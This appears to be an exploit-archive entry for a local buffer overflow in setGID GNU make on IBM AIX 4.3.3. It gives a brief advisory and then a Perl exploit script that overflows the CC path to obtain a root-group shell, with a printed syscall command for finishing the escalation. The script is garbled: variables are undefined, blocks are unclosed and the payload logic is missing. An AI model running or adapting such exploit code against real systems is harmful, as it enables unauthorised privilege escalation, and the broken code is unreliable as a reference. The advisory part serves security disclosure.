GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow

Related Vulnerabilities: CVE-2004-2312  
Publish Date: 30 May 2003
Author: watercloud

GNU make for IBM AIX has been reported to be prone to a buffer overflow vulnerability, the issue is reported to exist due to a lack of sufficient boundary checks performed when reading the path to the CC compiler.

Because the GNU make utility is reported to run with setGID root privileges, a local attacker may potentially exploit this condition to gain access to the root group.

This issue is reported to exist on AIX 4.3.3 platforms.

# FileName:
# Exploit /usr/local/bin/make of Aix4.3.3 to get a gid=0 shell.
# Tested    on low version of Aix4.3.3. 
# Author  :
# Site    : (EN)  / (CN)
# Date    : 2003-5-30
# Announce: use as your owner risk!



print "\n\nExploit $CMD for Aix 4.3.3 to get gid=0 shell.\n";
print "From: [ 2003-5-30 ].\n\n";
print "Note :use this command to get gid=0 after egid=0 :\n";
print "/usr/bin/syscall setregid 0 0 \\; execve '/bin/sh'\n";

$str="k:k.c\n\t\${CC} k.c\n\t";
open  mfd,">Makefile" or die "open file Makefile for write error!\n";
open  kfd,">k.c"     or die "open file .k.c for write error!\n";
print mfd $str,  print kfd $str;
close mfd, close kfd;


foreach $GID ( @GID_LIST) {
  system $CMD ,"CC="."\x2f\xf2\x2b\x40"x300;

unlink "Makefile","k.c";

sub getshell($XID,$GID) {
  my $SHELL,($XID,$GID)=@_;
  return $SHELL;